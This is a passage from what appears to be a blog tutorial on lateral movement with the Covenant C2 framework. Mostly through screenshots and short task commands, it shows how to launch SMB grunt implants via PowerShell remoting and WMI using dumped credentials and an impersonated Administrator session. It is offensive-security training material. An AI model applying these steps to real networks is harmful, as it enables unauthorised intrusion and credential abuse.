target machine:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJKeXVp-EN8G_RDODaeatjrc4py46qfmJdn5AYBw2r7-UwEGaOEih11GmLHrkxUV2nVGvDxwAFq46UyWn9iTZDu84DqnY7Em7ePbAuAgYxxsMOjB36fDxbm6w-TisUeE1EnFsvbT_kjyD-KOP_v1GJwlblhU8N_BZXZihW1v-rkKSt_vnVgcm28OF4/s993/wmic2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="616" data-original-width="993" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJKeXVp-EN8G_RDODaeatjrc4py46qfmJdn5AYBw2r7-UwEGaOEih11GmLHrkxUV2nVGvDxwAFq46UyWn9iTZDu84DqnY7Em7ePbAuAgYxxsMOjB36fDxbm6w-TisUeE1EnFsvbT_kjyD-KOP_v1GJwlblhU8N_BZXZihW1v-rkKSt_vnVgcm28OF4/s16000/wmic2.png" /></a></div><br /> Upon successful execution, we will have output like this:<p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFjiXJtuAXXyB698s0j_HINs_1mr14BvKQx_91_vf1iMz-0nmNS5UwRTYEKdz-FpQeRGjxEUHjxtKxQ8Z5ygAGip8g2Gr4MrDdoPIxofm3wk1ULeij4cj1hC1-EiSP5r639j35zKAXHOm0VvzVo0tUNdwCwxl6gOJhk1Q5cLAmY0klDtRpS23i0P2B/s1207/wmic3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="666" data-original-width="1207" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFjiXJtuAXXyB698s0j_HINs_1mr14BvKQx_91_vf1iMz-0nmNS5UwRTYEKdz-FpQeRGjxEUHjxtKxQ8Z5ygAGip8g2Gr4MrDdoPIxofm3wk1ULeij4cj1hC1-EiSP5r639j35zKAXHOm0VvzVo0tUNdwCwxl6gOJhk1Q5cLAmY0klDtRpS23i0P2B/s16000/wmic3.png" /></a></div><br /><p>It's
time to connect to launched grunt by using connect task. Specify the
target host machine and <span style="color: white;">SMBpipename </span>and click Task button:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaSa4SuJM8NPkoozPpKbWTY6Evlrb9p-N-wTFHYqa9aLVyaXgkTfswORbA8PYCz_IXQaaJ9-SdgfUFnMlkFXmYcOrDWBdKoutO1CEQQe72JPDFiaJvt--Ckxkiwsywp2GWpQuokVzEtaKWsBsljEE5Ky0siIFWzOdBIcjb9FAYQZwkcw1W7PMzIrQ6/s569/wmic4.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="569" data-original-width="540" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaSa4SuJM8NPkoozPpKbWTY6Evlrb9p-N-wTFHYqa9aLVyaXgkTfswORbA8PYCz_IXQaaJ9-SdgfUFnMlkFXmYcOrDWBdKoutO1CEQQe72JPDFiaJvt--Ckxkiwsywp2GWpQuokVzEtaKWsBsljEE5Ky0siIFWzOdBIcjb9FAYQZwkcw1W7PMzIrQ6/s16000/wmic4.png" /></a></div><p>And we got connection.....</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgx5HonIxf6KJyCOiyh40n_kM8g-rxGMeZHVECXdMxn6HBt5QG5VVbmpS3c_0SuNGEHGl_LQyEucAbCIk5SigxHXHwzEBU-aObJ5OtLcaEVFYOJXZ3rkcSWJy_gluCwd_AiPicLvWK787-CwatS-OX7oughubmkLBhLzJ69FOxmu8mexrFhUnQPnM_1/s1245/wmic5.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="619" data-original-width="1245" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgx5HonIxf6KJyCOiyh40n_kM8g-rxGMeZHVECXdMxn6HBt5QG5VVbmpS3c_0SuNGEHGl_LQyEucAbCIk5SigxHXHwzEBU-aObJ5OtLcaEVFYOJXZ3rkcSWJy_gluCwd_AiPicLvWK787-CwatS-OX7oughubmkLBhLzJ69FOxmu8mexrFhUnQPnM_1/s16000/wmic5.png" /></a></div><p></p><h3 style="text-align: left;"><span style="background-color: black;"><span style="color: #fcff01;"><span style="font-weight: normal;">1. (c) PowerShellRemotingCommand (using dumpped creds)</span></span></span></h3><p><span style="color: white;"><b>Configure launcher</b></span> <br /></p><p>For
this module, we need to configure PowerShell based Launcher. I have
selected the listener as http, selected ImplantTemplate as <span style="color: white;">GruntSMB</span>,
specified a name i.e. <span style="color: white;">smbconnect_power2</span> in <span style="color: white;">SMBpipename</span>, clicked
'Generate' button and copied the generated PowerShell based payload.<br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlukjEbwFYsLZNkOvK0f-p5k6IXwkzAnt5_PN8FvxXFI3iMn2LL_R6dkuOYK6jWz9J0GiBkF50-Lywbm5h5jxclOjiSG5FUlzAnrl8ifA2TOsUJYi-CRZfYxBp2jEUKDLL-ZfJ6kjjMQMCmz0mUnUttm8gaqaAPscjgNqGE-ukYrqOco968mm8UwAS/s1592/power2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="766" data-original-width="1592" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlukjEbwFYsLZNkOvK0f-p5k6IXwkzAnt5_PN8FvxXFI3iMn2LL_R6dkuOYK6jWz9J0GiBkF50-Lywbm5h5jxclOjiSG5FUlzAnrl8ifA2TOsUJYi-CRZfYxBp2jEUKDLL-ZfJ6kjjMQMCmz0mUnUttm8gaqaAPscjgNqGE-ukYrqOco968mm8UwAS/s16000/power2.png" /></a></div><p></p><p><span style="color: white;">Dont forget to perform make token step (demonstrated in method 1(a)) </span></p><p>Switch
to Grunt and in Task section, select <span style="color: white;">PowerShellRemotingCommand </span>task,
paste the copied PowerShell basedpayload (from above step) in command
input box, specify the other details such as username, password and
domain (keep it . if user is local and not a domain user):</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwGoo1l9k74aJV3ik32fq87i5htbryLu1Q_6zpBdXQ6cFnMbSff4dvBN5fYgU-eqNd_OEV2IMI-yv-3NdYSv3f-vUNdk_tQyUw_t9P2BDiojYc6Jfm9Vw3pAqiMjYcvCyE0z0fpYJ9B7AZT3-R9ZSwlP5Gl4Qk5_pLHpnYZuHD3tvK_hLgXNHf6UsW/s781/power3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="781" data-original-width="757" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwGoo1l9k74aJV3ik32fq87i5htbryLu1Q_6zpBdXQ6cFnMbSff4dvBN5fYgU-eqNd_OEV2IMI-yv-3NdYSv3f-vUNdk_tQyUw_t9P2BDiojYc6Jfm9Vw3pAqiMjYcvCyE0z0fpYJ9B7AZT3-R9ZSwlP5Gl4Qk5_pLHpnYZuHD3tvK_hLgXNHf6UsW/s16000/power3.png" /></a></div><br /> After clicking 'Task' button, you will not get any output. <p></p><p>Now,
in 'Task' tab, select 'connect' and specify the target machine
hostname, smbpipename specified for the PowerShell based launcher (in my
case it was <span style="color: white;">smbconnect_power2</span>) and click 'Task' button:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJaqcvMYLMOKKPak8FOnyrceUHX1G_hEgBnCijfy-idBA7N3hmuMiLLaOR5-_nxk0zJFTdIMf4Q7QVeByh4LeOCqpfMGFLSN7wjr5Kf6rPl5AhizMknb6yYiabBzrAcUHRhelJjQAjMkBxApPT2ZqBzutGN70VQHTyWsYXQ6-0V1ddx8mMhO_Ak_km/s625/power5.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="514" data-original-width="625" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJaqcvMYLMOKKPak8FOnyrceUHX1G_hEgBnCijfy-idBA7N3hmuMiLLaOR5-_nxk0zJFTdIMf4Q7QVeByh4LeOCqpfMGFLSN7wjr5Kf6rPl5AhizMknb6yYiabBzrAcUHRhelJjQAjMkBxApPT2ZqBzutGN70VQHTyWsYXQ6-0V1ddx8mMhO_Ak_km/s16000/power5.png" /></a></div><p>Wait for a while and you will have connection from remote machine:</p><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikAZ_C6HQFIqmS8uyk6kJ4hgSe9o8a5KU0yHqCNpl8HQKKCbXBz7JpVl-w3GcLAgeX12_4iI_SdkYFK9eKGAwwQJaqc9IoIquRkqvVPM5loAUm4-HOkMVdP133tGDpTNm5fIU_H39JeYRsqKzyPurhe4Fsq6B07PKbofNZjP92lv34sXi9M55gcg-e/s1272/power4.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="611" data-original-width="1272" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikAZ_C6HQFIqmS8uyk6kJ4hgSe9o8a5KU0yHqCNpl8HQKKCbXBz7JpVl-w3GcLAgeX12_4iI_SdkYFK9eKGAwwQJaqc9IoIquRkqvVPM5loAUm4-HOkMVdP133tGDpTNm5fIU_H39JeYRsqKzyPurhe4Fsq6B07PKbofNZjP92lv34sXi9M55gcg-e/s16000/power4.png" /></a></div><p></p><h3 style="text-align: left;"><span style="background-color: black;"><span style="color: #fcff01;"><span style="font-weight: normal;">1. (d) PowerShellRemotingGrunt (using dumpped creds)</span></span></span></h3><p><span style="color: white;"><b>Configure launcher</b></span> <br /></p><p>For
this module, we need to configure PowerShell based Launcher. I have
selected the listener as http, selected ImplantTemplate as <span style="color: white;">GruntSMB</span>,
specified a name i.e. <span style="color: white;">smbconnect_power2</span> in <span style="color: white;">SMBpipename</span>, clicked
'Generate' button and copied the generated PowerShell based payload.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAWZM_AnYVYd-e9J5UZggA7UolRyZSndFhpAKUdytKM6oOMMFgNXqdmSnO5s5Ja4vgmxWDhrAwfff2JPA-azKfP_h5hQvMvJ-oRTCMt22oLZyi1ZW0gso5f6n-tXaKfOT1ZxfRH4q33xiGjSj-aX-Vtmrc7qP7_FjZIajXFTUywQj_UqI9lekVjJqp/s954/pr1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="786" data-original-width="954" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAWZM_AnYVYd-e9J5UZggA7UolRyZSndFhpAKUdytKM6oOMMFgNXqdmSnO5s5Ja4vgmxWDhrAwfff2JPA-azKfP_h5hQvMvJ-oRTCMt22oLZyi1ZW0gso5f6n-tXaKfOT1ZxfRH4q33xiGjSj-aX-Vtmrc7qP7_FjZIajXFTUywQj_UqI9lekVjJqp/s16000/pr1.png" /></a></div><p></p><p></p><p><span style="color: white;">Dont forget to perform make token step (demonstrated in method 1(a)) </span></p><p>Switch
to Grunt and in Task section, select <span style="color: white;">PowerShellRemotingGrunt </span>task,
specify the details such as Computername, Luncher, username, password and
domain (keep it . if user is local and not a domain user):</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDnMYW3fYW3P9t097l18e_4zC0m6nexobCwPqub8TkSVLD2iXX-TFtr0JM3UG44zPzX2XPkrbgaQjM2ZvrhnIi6as68mZvmSLjFbiibHawJC-5_nRO5Hv58md_8gcMZMIh08nAdDWPtLkRXQBWvjAciqcjLXPX21qWixUTMy2jYUmrFrKQhCMtgDhc/s786/pr2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="786" data-original-width="650" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDnMYW3fYW3P9t097l18e_4zC0m6nexobCwPqub8TkSVLD2iXX-TFtr0JM3UG44zPzX2XPkrbgaQjM2ZvrhnIi6as68mZvmSLjFbiibHawJC-5_nRO5Hv58md_8gcMZMIh08nAdDWPtLkRXQBWvjAciqcjLXPX21qWixUTMy2jYUmrFrKQhCMtgDhc/s16000/pr2.png" /></a></div><p></p><p></p><p>After clicking 'Task' button, you will not get any output. </p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMut52NnfACgDkInrMiHdTT1odoYzIFJ7D4nI4Btxe0gGqgQdARN-u6kUpBX5iiYgDyT6lCyvC9lKgI3mWVvjHol3fQAgw_B4oekFoeiwR6qA6lGRA30VOr6T5-KwAE8gEXXadUnJazJw76VYrx7ZGGiasU-8gAHdK_5Qh-5n4f30XOBpSJF_DYXu3/s1220/pr3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="135" data-original-width="1220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMut52NnfACgDkInrMiHdTT1odoYzIFJ7D4nI4Btxe0gGqgQdARN-u6kUpBX5iiYgDyT6lCyvC9lKgI3mWVvjHol3fQAgw_B4oekFoeiwR6qA6lGRA30VOr6T5-KwAE8gEXXadUnJazJw76VYrx7ZGGiasU-8gAHdK_5Qh-5n4f30XOBpSJF_DYXu3/s16000/pr3.png" /></a></div><br />Now,
in 'Task' tab, select 'connect' and specify the target machine
hostname, smbpipename specified for the PowerShell based launcher (in my
case it was <span style="color: white;">smbconnect_power1337</span>) and click 'Task' button:<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj41yaS4tEOz1salv7BOcapFm4YEKL8dX-2q4fEDvDmFzXlUSkYyDq2VJRkyQhVoOyIqzu8PNrFMo8V5Xmp9jVV3D5XM37n3aDyfgcfZYfxmMWbdTO5sESYDIIZZROA7o6_5kr2GN-F1rjrNwIEXtbGo07FepUZtZC7nQYc8TBA5N7vE5T6YW_1niYm/s542/pr4.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="516" data-original-width="542" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj41yaS4tEOz1salv7BOcapFm4YEKL8dX-2q4fEDvDmFzXlUSkYyDq2VJRkyQhVoOyIqzu8PNrFMo8V5Xmp9jVV3D5XM37n3aDyfgcfZYfxmMWbdTO5sESYDIIZZROA7o6_5kr2GN-F1rjrNwIEXtbGo07FepUZtZC7nQYc8TBA5N7vE5T6YW_1niYm/s16000/pr4.png" /></a></div><p></p><p>Wait for a while and you will have connection from remote machine:</p><div class="separator" style="clear: both; text-align: center;"></div><p></p><span style="font-weight: normal;"></span><p style="text-align: left;"><span style="font-weight: normal;"></span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTlxo2U0Lb3ARZ3SMWgFRu-HBt7fcxNzl5V41khsWW_Ac811aJU7J20o6CfJTtt-oMcPwd6PNuh-cXxbnPTP9mkjL38UoLw4kl8mWSQfcvJjT8KvCGuUtzkFFEZkr_BHfE0Uo3BjhEY3J0sci4jnXu2S_hc7DnD9bqnJDXeX725abCMoZ3VVn8_HgK/s1269/pr5.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="488" data-original-width="1269" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTlxo2U0Lb3ARZ3SMWgFRu-HBt7fcxNzl5V41khsWW_Ac811aJU7J20o6CfJTtt-oMcPwd6PNuh-cXxbnPTP9mkjL38UoLw4kl8mWSQfcvJjT8KvCGuUtzkFFEZkr_BHfE0Uo3BjhEY3J0sci4jnXu2S_hc7DnD9bqnJDXeX725abCMoZ3VVn8_HgK/s16000/pr5.png" /></a></div><span style="font-weight: normal;"></span><p></p><h3 style="text-align: left;"><span style="background-color: black;"><span style="color: #fcff01;"><span style="font-weight: normal;">2. </span></span></span><span style="background-color: black;"><span style="color: #fcff01;"><span style="font-weight: normal;">Using Impersonated User session<br /></span></span></span></h3><p></p><p>Let's
assume we have auser 'Administrator' logged in to the compromised
machine and this user has access to machine B. To gain access as
'Administrator' user on machine B, we need to go for following approach:</p><p><span style="color: white;"><b>Enumerate
logged in users -> Impersonate user -> Launch SMB grunt on
machine A with the privilege of impersonate user -> use new grunt
session to launch SMB grunt on Machine B</b></span></p><p><span style="color: #fcff01;">Enumerate logged in user</span></p><p>To enumerate logged-in user, Covenant has Task <span style="color: white;">GetNetLoggedOnUser</span>. Specify the machine Hostname and click <span style="color: white;">Task</span> button: <br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJOz7Csz9fh2RrAD0YnrOLxwrRKYwlhHssQqxIfoR_N2-TwBZbvtMCn91FX4H8Svo1EX7lbMo5hLFKeF0hYgAhpHBx3LIIb4WgKvzqkSADFWq5LIvJ4u8SHFFJbN0_HABOR-UBEzOyRRgjStis0izna_Ns760VaC9Sx_zeeoGbNGEG5u5vBqsd1L2E/s485/im1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="433" data-original-width="485" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJOz7Csz9fh2RrAD0YnrOLxwrRKYwlhHssQqxIfoR_N2-TwBZbvtMCn91FX4H8Svo1EX7lbMo5hLFKeF0hYgAhpHBx3LIIb4WgKvzqkSADFWq5LIvJ4u8SHFFJbN0_HABOR-UBEzOyRRgjStis0izna_Ns760VaC9Sx_zeeoGbNGEG5u5vBqsd1L2E/s16000/im1.png" /></a></div><p>We have a user <span style="color: white;">Administrator</span> logged-in to the compromised machine:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYzQpPXsyku9FC9JemSki86x-VitZDmQXVmHLi-4lZkV8fX82XATvPdmefqkXOuZC7zrSMzrq4SHvpeIuM3TpX_aDEmuiBqWfgTX5MaKaqP2zRQHYqeJaKpquRbiYdeVNpLDsHR1olCIwZOfkFvskAFYAB1fWkpsLaGzQWGdRvdMyl9tRW8L3lugmd/s686/im2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="542" data-original-width="686" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYzQpPXsyku9FC9JemSki86x-VitZDmQXVmHLi-4lZkV8fX82XATvPdmefqkXOuZC7zrSMzrq4SHvpeIuM3TpX_aDEmuiBqWfgTX5MaKaqP2zRQHYqeJaKpquRbiYdeVNpLDsHR1olCIwZOfkFvskAFYAB1fWkpsLaGzQWGdRvdMyl9tRW8L3lugmd/s16000/im2.png" /></a></div><p></p><p><span style="background-color: black;"><span style="color: #fcff01;">Impersonate logged in user</span></span></p><p>To impersonate logged-in user, use Task <span style="color: white;">ImpersonateUser</span>. Specify the username of the user which we want to impersonate (specify the domain name if user is a domain user):</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSWNngL5_LtBUvK5LyDOKDJmHWyurOHIAby8tHKJIE4ZqcPOY--BpmBEnd7fVTi1gJKEwVYLswiO8GF0k2JiWr7mq0LFXP8wAA_W4dJUYL4Pa09xqkF6o3dTn6mbQYRDOYa-PkCilo0aA5Ler5FCqDEUJyyvYuw_kiUlvdfMBTWJsfLzOU-GYBGg8E/s619/im3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="424" data-original-width="619" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSWNngL5_LtBUvK5LyDOKDJmHWyurOHIAby8tHKJIE4ZqcPOY--BpmBEnd7fVTi1gJKEwVYLswiO8GF0k2JiWr7mq0LFXP8wAA_W4dJUYL4Pa09xqkF6o3dTn6mbQYRDOYa-PkCilo0aA5Ler5FCqDEUJyyvYuw_kiUlvdfMBTWJsfLzOU-GYBGg8E/s16000/im3.png" /></a></div><p>After successful impersonattion, we will have following message:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIO5WcnDK495v0JpWmdwNKMrLcO7gUSPkZxWKZEf6XCHlifNEqQA_NnSLOj0caHsKc0JsUD2ZCEWSeLq_9B8lCdP4ZPLjBORNgizxZPkBiDau6DnbCnbAXA5M2p4m1609UTsxh-elw8yjrsYZEVChAiNW6UVKqBr7gpfiY0jG5rhOuTHoyw4jWWKdp/s530/im4.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="180" data-original-width="530" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIO5WcnDK495v0JpWmdwNKMrLcO7gUSPkZxWKZEf6XCHlifNEqQA_NnSLOj0caHsKc0JsUD2ZCEWSeLq_9B8lCdP4ZPLjBORNgizxZPkBiDau6DnbCnbAXA5M2p4m1609UTsxh-elw8yjrsYZEVChAiNW6UVKqBr7gpfiY0jG5rhOuTHoyw4jWWKdp/s16000/im4.png" /></a></div><p>Now, we just need to configure Launcher and select <span style="color: white;">ImplantTemplate</span> as <span style="color: white;">GruntSMB</span>. In my case, I specified <span style="color: white;">SMBpipename </span>as <span style="color: white;">smb_pshell</span>:<br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQPcJgyfB1pJQwmU0uRQdgiKJhUlN-7pl6MI0lZC7AdCGCdgQGnn6fHJCLM1v9UGZgepL1e4GL95ZV_x960aR1DdMb0u_fFZOHVdDN3fm6PwezI6e9uiDESQnFKVZ4HBj73gOJ9buHUG8ALoWt_tNSyvV-3s4qIjm00tHTVIyt-VLJEI_hm4mJANWT/s917/im5.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="780" data-original-width="917" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQPcJgyfB1pJQwmU0uRQdgiKJhUlN-7pl6MI0lZC7AdCGCdgQGnn6fHJCLM1v9UGZgepL1e4GL95ZV_x960aR1DdMb0u_fFZOHVdDN3fm6PwezI6e9uiDESQnFKVZ4HBj73gOJ9buHUG8ALoWt_tNSyvV-3s4qIjm00tHTVIyt-VLJEI_hm4mJANWT/s16000/im5.png" /></a></div><p></p><h3 style="text-align: left;"></h3><p><span style="background-color: black;"><span style="color: #fcff01;"><b> Launch SMB grunt on machine A with the privilege of impersonate user - WMIGrunt</b></span></span> <br /></p><p>Now,
launch Grunt using WMI. This time, I am not going to specify the creds
because we have access to a user who is logged in and can launch grunt
on local machine.</p><p>Command will be:</p><p></p><textarea style="height: 28px; margin: 0px; width: 250px;">WMIGrunt hostname launcher</textarea><p>in my case it was </p><p></p><textarea style="height: 28px; margin: 0px; width: 250px;">WMIGrunt localhost powershell</textarea><p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiK6EjuAYaYI4tyrV2rkGqotXh73TeIfdnprYhVUU_kZphhxTU7r5T2gguFIwp4ZTI0lHsH98R6XuQrh3eHMcMxxidzaBO3GPaHsuP4J-66qJUiMYrFdu0G9NEnXXaV757TEdZBPZFrH1JEr04lKkTV8ogZExzpo4IrMBDuOg9KXMBqCA_C2t3mVVUz/s1230/im6.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="579" data-original-width="1230" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiK6EjuAYaYI4tyrV2rkGqotXh73TeIfdnprYhVUU_kZphhxTU7r5T2gguFIwp4ZTI0lHsH98R6XuQrh3eHMcMxxidzaBO3GPaHsuP4J-66qJUiMYrFdu0G9NEnXXaV757TEdZBPZFrH1JEr04lKkTV8ogZExzpo4IrMBDuOg9KXMBqCA_C2t3mVVUz/s16000/im6.png" /></a></div><p>After Launching the grunt successfully, we need to connect to it using connect command because this is SMB based grunt.<br /></p><p>In my case it was:</p><p></p><p></p><textarea style="height: 28px; margin: 0px; width: 300px;">connect localhost smb_pshell</textarea><p></p><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1N0X0HcTtZ68yvp6pUrQe7EEzRNHSTaApg-tiHDGUGzfBz6Zh3RicIq2zsqQotByYVsxZ1kYDRHX_kwDm978A29ODbBNfUJAp7EJdbXpIpUSJZ48yR-T8mDDklwQMQYC3SPJ-G160vxxscK9K2r6alXfBBSi4NPoWFkZ0hIDI5sHdsFMzcMs4Ph5g/s1470/im7.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="657" data-original-width="1470" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1N0X0HcTtZ68yvp6pUrQe7EEzRNHSTaApg-tiHDGUGzfBz6Zh3RicIq2zsqQotByYVsxZ1kYDRHX_kwDm978A29ODbBNfUJAp7EJdbXpIpUSJZ48yR-T8mDDklwQMQYC3SPJ-G160vxxscK9K2r6alXfBBSi4NPoWFkZ0hIDI5sHdsFMzcMs4Ph5g/s16000/im7.png" /></a></div><p><span style="background-color: black;"><span style="color: #fcff01;"><b><span style="background-color: black;"><span style="color: #fcff01;"></span></span></b></span></span></p><p><span style="background-color: black;"><span style="color: #fcff01;">Use new grunt session to launch SMB grunt on Machine B</span></span></p><p>Once we got the grunt session as impersonated user, we can use this session to launch Grunt on another machine directly. </p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDbZjKCkQR6p4yNxjb3UlDEbW6dw-OtoJqpO08wm8OoAZqvUcPLYpT16eNlJFbGNcRw4WT0BZevj0AK7G76snRpwcS2KescI8U2kVMQEvqTCMeUrTKVFZ9AffbEdKr4orqH65WANxXN2sIXwE3_7dMt2HlujTTN1JZ5wENQnv8gNIEnT0Rf1Yg6UQv/s1402/im8.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="796" data-original-width="1402" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDbZjKCkQR6p4yNxjb3UlDEbW6dw-OtoJqpO08wm8OoAZqvUcPLYpT16eNlJFbGNcRw4WT0BZevj0AK7G76snRpwcS2KescI8U2kVMQEvqTCMeUrTKVFZ9AffbEdKr4orqH65WANxXN2sIXwE3_7dMt2HlujTTN1JZ5wENQnv8gNIEnT0Rf1Yg6UQv/s16000/im8.png" /></a></div><br />After switching to newly created grunt session, use <span style="color: white;">WMIGrunt </span>task, specify target machine hostname, powershell as launcher name and wait for the response:<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi93dXmw9SCrDCm6vRyJ1qT8URiH1nGP54ebmyp2q0R7wl1_y2pndszVBL30rU1VdbMcedjP8Xg1tQcEjE3O7YOAq127tAPK9nydEsoEzNxH4j8SatVfueJGWbdQIqMTpj7FgZT_mVuRthxRlI10lTFzrmvmwz6R9olY8T_Xlj0K6GqglVsC_6njGe3/s975/im9.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="612" data-original-width="975" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi93dXmw9SCrDCm6vRyJ1qT8URiH1nGP54ebmyp2q0R7wl1_y2pndszVBL30rU1VdbMcedjP8Xg1tQcEjE3O7YOAq127tAPK9nydEsoEzNxH4j8SatVfueJGWbdQIqMTpj7FgZT_mVuRthxRlI10lTFzrmvmwz6R9olY8T_Xlj0K6GqglVsC_6njGe3/s16000/im9.png" /></a></div><br /> Connect to the SMB grunt using connect command:<p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCooASAzqT7QNf-tkbeDoCcXXcoAZ2hF13avKZJczdYR4FYAsYsEU0yeFPXJF_PTBm_ZaTnbAmYRVOHA4yKbRaLA1E-6NDQ4-QmcoBOlD345X58YXqWu0cy6srasirUpEF_2UVimYTldX9n14KBf3PcGoTmeieU6MvkzhQlaX0MEUzU7mjc8xbeJgq/s978/im11.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="631" data-original-width="978" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCooASAzqT7QNf-tkbeDoCcXXcoAZ2hF13avKZJczdYR4FYAsYsEU0yeFPXJF_PTBm_ZaTnbAmYRVOHA4yKbRaLA1E-6NDQ4-QmcoBOlD345X58YXqWu0cy6srasirUpEF_2UVimYTldX9n14KBf3PcGoTmeieU6MvkzhQlaX0MEUzU7mjc8xbeJgq/s16000/im11.png" /></a></div><p><span style="background-color: black;"><span style="color: #fcff01;"><b> Launch SMB grunt on machine A with the privilege of impersonate user - WMIGrunt</b></span></span> <br /></p><p></p><p>Similar way, we can use <span style="color: white;">PowerShellRemotingGrunt</span>.</p><p>Dont forget to create PowerShell launcher with different <span style="color: white;">SMBPipename</span>:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgC6-hC8LV189RlvgmgfKI7uBsLUyCR3dqDg8yTbycsvURoM7pOaGoWNL9maOTyfq1pTCLaleMIkH8HBibBLNWII3opL2vbNrjH9uTMl-gM8ppSy5ts0sWvKP-Y47PGCFT2DwciKBkXM50GDTCqOcekcDCVSjoef0Elj91bL7TfWIVeY_9p6H1ldIu4/s983/im12.png" style="margin-left: 1em; margin-right: 